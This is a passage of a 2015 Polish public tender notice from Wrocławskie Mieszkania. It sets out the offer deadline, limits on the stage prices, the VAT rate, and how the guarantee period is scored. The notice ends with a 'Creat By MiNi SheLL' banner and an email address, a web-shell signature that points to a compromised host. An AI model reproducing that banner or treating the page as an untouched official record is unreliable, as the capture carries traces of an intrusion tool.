<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławskie Mieszkania Sp. z o.o., ul. Mikołaja Reja 53-55, 50-343 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2015 godzina 09:00, miejsce: Wrocławskie Mieszkania Sp. z o.o., ul. Mikołaja Reja 53-55, 50-343 Wrocław (kancelaria)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Spółka Wrocławskie Mieszkania Sp. z o.o. występuje w imieniu Gminy Wrocław na podstawie pełnomocnictwa Nr 1/IV/Z/15 Prezydenta Wrocławia z dnia 05.01.2015 r. 2.Cena ryczałtowa brutto za wykonanie Etapu I - nie może być wyższa niż 10% ceny ryczałtowej brutto za wykonanie Etapu II. W przypadku, gdy Wykonawca w formularzu oferty (załącznik nr 1 do SIWZ), w tabeli w pozycji 1 wpisze wartość przekraczającą maksymalny próg 10% wartości brutto Etapu II, Zamawiający poprawi ją jako omyłkę rachunkową w taki sposób, aby wartość Etapu I stanowiła 10% wartości brutto Etapu II, a powstałą różnicę doda do wartości Etapu II. O wprowadzonej poprawce Zamawiający poinformuje Wykonawcę, którego oferta zostanie poprawiona na podstawie art. 87 ust. 2 pkt 2 ustawy Pzp. Inne omyłki rachunkowe Zamawiający poprawi zgodnie z art. 87 ust. 2 ustawy Pzp. 3.Wykonawca ma obowiązek ustalenia stawki podatku VAT dla przedmiotowego zamówienia w wysokości, która wynika z przepisów prawa podatkowego. Zamawiający określił 23% stawkę podatku VAT dla wykonania przedmiotu zamówienia w zakresie Dokumentacji i Robót budowlanych. W przypadku, gdy Wykonawca poda w ofercie inną, niż podana przez Zamawiającego stawkę podatku VAT, bądź jest zwolniony od podatku VAT należy przedstawić w ofercie uzasadnienie wraz z podstawą prawną. 4.Okres gwarancji  na Dokumentację i Roboty budowlane liczony jest w miesiącach.
Zaoferowany przez Wykonawcę okres gwarancji na Dokumentację i Roboty budowlane nie może być krótszy niż 36 miesięcy. 
Maksymalną wartość punktową w kryterium okres gwarancji na Dokumentację i Roboty budowlane otrzyma oferta z najdłuższym okresem gwarancji na dokumentację roboty budowlane spośród wszystkich złożonych ofert. W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, Zamawiający do wyliczenia punktów przyjmie gwarancję maksymalną w wysokości 60 miesięcy, natomiast do umowy zostanie wpisany okres gwarancji wskazany przez Wykonawcę w formularzu oferty.
Zaoferowanie gwarancji minimalnej o długości 36 miesięcy spowoduje przyznanie 0 pkt 
w kryterium okres gwarancji na Dokumentację i Roboty budowlane.
W przypadku, gdy Wykonawca zaoferuje termin gwarancji krótszy niż 36 miesięcy, bądź nie wskaże jej okresu, Zamawiający odrzuci ofertę takiego Wykonawcy zgodnie z art. 89 ust.1 pkt 2 ustawy Pzp..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com